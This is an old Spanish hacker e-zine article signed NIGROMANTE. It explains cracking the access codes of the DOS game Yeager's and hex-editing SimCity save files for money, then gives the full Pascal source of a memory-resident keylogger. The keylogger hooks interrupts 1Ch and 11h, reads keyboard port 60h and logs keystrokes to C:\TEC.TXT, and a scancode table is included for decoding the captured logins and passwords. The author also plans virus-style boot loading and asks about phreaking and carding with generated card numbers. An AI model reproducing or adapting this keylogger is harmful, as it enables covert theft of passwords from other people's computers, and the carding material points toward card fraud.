IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII o 04. UN PAR DE CRACKS o IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII BUENAS.. Me gustar¡a ense€aros como se crackean dos juegos, uno de ellos bastante antiguo como es el YEAGERS y el otro es el SIMCITY. El YEAGERS es bastante sencillo, utilizando un sencillo editor de memoria, residente en memoria, como puede ser el game wizard puedes leer las claves de entrada del juego en la memoria ya que estan en ascii y con cualquier comando de busqueda. encuentra la pregunta y despues en ascii la respuesta. Por lo que entrar es bastante sencillo. Para el SIMCITY utilizo algo obvio,( aunque se necesita la imaginacion para descubrirlo) ,para tener el maximo de dinero. Edito hexadecimalmente los archivos (que tienen extension sc2) y modifico el par de caracteres hexadecimales de la posicion 2A. Utilizando del debug ser¡a as¡: debug ejemplo.sc2 e 12a 'ya que el debug carga el archivo 'en la posicion 100 'ahora puedes modificar 2 pares .FF .FF 'de caracteres hexadecimales 'que es lo que ocupa el dinero 'escribiendo despues de los puntos 'pongo FF FF ya que es lo maximo en hexadecimal n 'para grabar en el archivo FELICIDADES has conseguido 65536 dolares (FFFFh) Conozco un amigo que consiguio incluso la direccion para pedir prestamos, yo no me he esforzado por conserguirla. šque como consegu¡ la direccion? Grab‚ una partida. Despues pase a hexadecimal el dinero que ten¡a en la partida, y busque con un editor hexadecimal (COMANDANTE NORTON, PCTOOLS ETC) ese n£mero. logicamente encontre unos cuantos, digamos 5 o 6. Vuelvo a entrar en el juego gasto algo de dinero, y vuelvo a buscarlo con el editor hexadecimal, ahora solo me queda una direccion bual . Ya tengo la direccion donde se guarda el dinero. Esto se puede extrapolar a cualquier juego. he modificado el doom 2 para tener m s municion de la que se puede tener. etc... Supongo que todo esto ya lo sab¡ais y si no supongo que os parece obvio. Por lo que adem s os mando el codigo en PASCAL de un programilla que lee codigos de teclado , y los graba en disco cuando se carga el windows, msd ,edit, qbasic etc (šque qu‚ tienen en com£n?, pues utilizan la interrupcion 11h de verificacion del EQUIPO) (que maravilloso es el mundo de las redirecciones je,je,je :) ) Utilizo la redireccion 1c (del reloj) para ir leyendo del puerto 60 que es el del teclado y lo voy guardando en la variable de texto que se guarda en un archivo si se ejecuta la int 11h .(es decir se carga el windows). Es la version 2.1 por lo que en posteriores versiones me gustar¡a que se cargase en el boot (UTILIZANDO TECNICAS DE VIRUS) (ahora lo tengo que cargar en el autoexec.bat para que se carge cada vez) y tambi‚n me gustar¡a que se eliminase de memoria al grabar en el archivo. Pero bueno, para lo que me interesa funciona , ya me entendeis je,je,je }:-) Intent‚ redireccionar la interrupcion 16 que es la del teclado pero resulta que se me bloquea el ordenador, mis conocimientos sobre el tema son bastante prehistoricos por ahora, si alguien me quiere decir por que se bloquea con la int 16h que me escriba un e-mail, aunque creo saber porqu‚ es. {$M $800,0,0 } { Esta es la version 2.1 del capturador de teclas } { utilizado por NIGROMANTE } uses Crt, Dos; var CLKIntVec,EquipoIntVec: Procedure; texto:string; aux:word; {$F+} procedure equipo; interrupt; var f: text; begin setIntVec($11,@equipoIntVec); setIntVec($1c,@clkIntVec); {$i-} assign(f,'c:\TEC.TXT'); append(F); texto:=texto+'(FIN)'; writeln(f,texto); close(f); {$i+} inline ($9C); equipoIntVec; end; procedure clock; interrupt; var temp:string; begin if aux<>port[$60] then begin aux:=port[$60]; str(aux,temp); if (aux<100) then texto:=texto+'|'+temp; end; inline ($9C); clkIntVec; end; {$F-} begin aux:=0; GetIntVec($1c,@CLKIntVec); SetIntVec($1c,Addr(clock)); GetIntVec($11,@equipoIntVec); SetIntVec($11,Addr(equipo)); Keep(0); end. { nota: HE UTILIZADO EL COMANDO APPEND POR LO QUE PARA QUE HAGA ALGO TIENE QUE EXISTIR EL ARCHIVO TEC.TXT EN C:\ } { En el archivo no aparecen palabras sino codigos de teclado (numeros) que el programa recibe del port[$60] ,pero tranquilos aqu¡ est n los codigos para que pod is descifrar el archivo, quiz s proximamente haga el programa para traducir el archivo, pero la verdad me canta ir descifrandolo a pelo y ver como aparecen lentamente logins y passwords ante mis hojos. los codigos estan ordenados de izquierda a derecha y de arriba a abajo del teclado. por lo que para conseguir el codigo de la letra F puedes empezar a contar por la letra A , de esta forma: A-30 S-31 D-32 F-33 (El codigo del F es 33) (esto lo digo para no tener que escribir toda la tabla) (aqu¡ esta la tabla reducida) { CODIGOS DE TECLADO ------------------- } { APRET. SIN APRET. ------ ---------- 1 2 130 ENTER 28-156 Q 16 144 SPACE 57 A 30 158 Z 44 172 TECLADO NUMRICO ---------------- 7 8 9 71 72 73 199 200 201 4 5 6 75 76 77 203 204 205 1 2 3 79 80 81 207 208 209 0 82 210 } Me gustar¡a algo de informacion sobre blue-boxings y phreaking (u otras cajitas) šSe pueden utilizar en Espa€a? šsi es as¡ como se utilizan? Y sobre carding, descubr¡ el algoritmo de generacion de targetas. šQue posibilidades tiene ese generador? šque verificacion hacen las compa€ias espa€olas de venta por internet con las targetas de credito? En sitios como www.centrocom.com puedes comprar articulos poniendo el nombre que aparece en la tarjeta, la fecha de caducidad y expedicion y el n£mero šque pasa puedes comprar con una tarjeta solo con esos datos?? šque futuro nos espera, si telefonica nos sigue tocando los gitos? šque tal va el codigo penal ,en referencia a delitos inform ticos? Afectuosamente NIGROMANTE....